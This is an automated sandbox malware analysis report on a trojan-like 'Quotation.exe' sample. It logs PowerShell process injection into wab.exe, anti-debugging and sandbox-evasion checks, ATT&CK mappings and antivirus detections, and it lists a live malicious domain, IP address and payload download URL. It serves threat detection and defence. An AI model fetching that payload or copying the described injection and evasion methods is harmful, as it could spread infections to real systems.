      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2400Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7466Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 6352Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_050BF7D8 GetSystemInfo,2_2_050BF7D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: svchost.exe, 00000005.00000002.2389702012.000002213063F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2393836683.0000022135C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781787171.0000000006EFC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.2112888645.0000000006F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000005.00000002.2388876888.000002213062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP8d0!
      Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08356CA0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_08356CA0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 275FFB4Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08359594 CreateNamedPipeW,2_2_08359594

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		112
      Process Injection      		11
      Masquerading      		OS Credential Dumping121
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		12
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		41
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)112
      Process Injection      		Security Account Manager41
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials23
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417386 Sample: Quotation.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 96 30 apwisulsel.sa.com 2->30 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 8 Quotation.exe 23 2->8         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 26 C:\Users\user\AppData\Local\...\Bowleres.Hed, ASCII 8->26 dropped 50 Suspicious powershell command line found 8->50 15 powershell.exe 20 8->15         started        34 127.0.0.1 unknown unknown 12->34 file6 signatures7 process8 file9 28 C:\Users\user\AppData\Local\...\Quotation.exe, PE32 15->28 dropped 36 Obfuscated command line found 15->36 38 Writes to foreign memory regions 15->38 40 Powershell drops PE file 15->40 19 wab.exe 6 15->19         started        22 conhost.exe 15->22         started        24 cmd.exe 1 15->24         started        signatures10 process11 dnsIp12 32 apwisulsel.sa.com 104.128.228.214, 443, 49710, 49712 HOSTUS-GLOBAL-ASHostUSHK United States 19->32

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Quotation.exe58%ReversingLabsWin32.Trojan.Generic
      Quotation.exe15%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe58%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe15%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      apwisulsel.sa.com1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      http://crl.ver)0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/(0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.binb0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/$0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.bing0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.binW0%Avira URL Cloudsafe
      http://www.microsoft.coiJa0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.bincf&0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.bin0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com50%Avira URL Cloudsafe
      https://apwisulsel.sa.com/C0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.bin1%VirustotalBrowse
      http://crl.microz;r0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/EnPWajJ251.binoE0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/0%Avira URL Cloudsafe
      https://apwisulsel.sa.com/r40%Avira URL Cloudsafe
      https://apwisulsel.sa.com/1%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      apwisulsel.sa.com
      		104.128.228.214
      		truefalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: malware
        • URL Reputation: malware
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://apwisulsel.sa.com/EnPWajJ251.bingwab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://crl.ver)svchost.exe, 00000005.00000002.2392550483.0000022135C00000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          https://apwisulsel.sa.com/EnPWajJ251.binbwab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore6powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorQuotation.exe, Quotation.exe.2.drfalse
              		high
              https://apwisulsel.sa.com/$wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://apwisulsel.sa.com/(wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://apwisulsel.sa.com/EnPWajJ251.binWwab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.2112888645.0000000006EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.microsoft.coiJapowershell.exe, 00000002.00000002.2094251518.0000000008B30000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://apwisulsel.sa.com/EnPWajJ251.bincf&wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://apwisulsel.sa.com/EnPWajJ251.binwab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2392316689.0000000006ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com5wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/Prod-C:edb.log.5.drfalse
                  		high
                  https://contoso.com/powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000005.00000003.1202909008.0000022135BB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://apwisulsel.sa.com/Cwab.exe, 0000000E.00000002.2392316689.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.microz;rpowershell.exe, 00000002.00000002.2094251518.0000000008B8C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://apwisulsel.sa.com/EnPWajJ251.binoEwab.exe, 0000000E.00000002.2392316689.0000000006EC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://apwisulsel.sa.com/wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://apwisulsel.sa.com/r4wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.128.228.214
                        		apwisulsel.sa.comUnited States
                        		7489HOSTUS-GLOBAL-ASHostUSHKfalse

                        Private

                        IP
                        127.0.0.1

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1417386
                        Start date and time:2024-03-29 07:30:41 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Quotation.exe
                        Detection:MAL
                        Classification:mal96.troj.winEXE@9/16@1/2
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 152
                        • Number of non-executed functions: 23
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 23.33.180.114
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target wab.exe, PID 7040 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        07:31:14API Interceptor43x Sleep call for process: powershell.exe modified
                        07:31:16API Interceptor2x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.128.228.214DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          JOU24013126.exeGet hashmaliciousAgentTeslaBrowse
                            Unpaid INV02.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        Quote.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          DHL-101667365.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            apwisulsel.sa.comDHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            JOU24013126.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.128.228.214
                                            Unpaid INV02.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
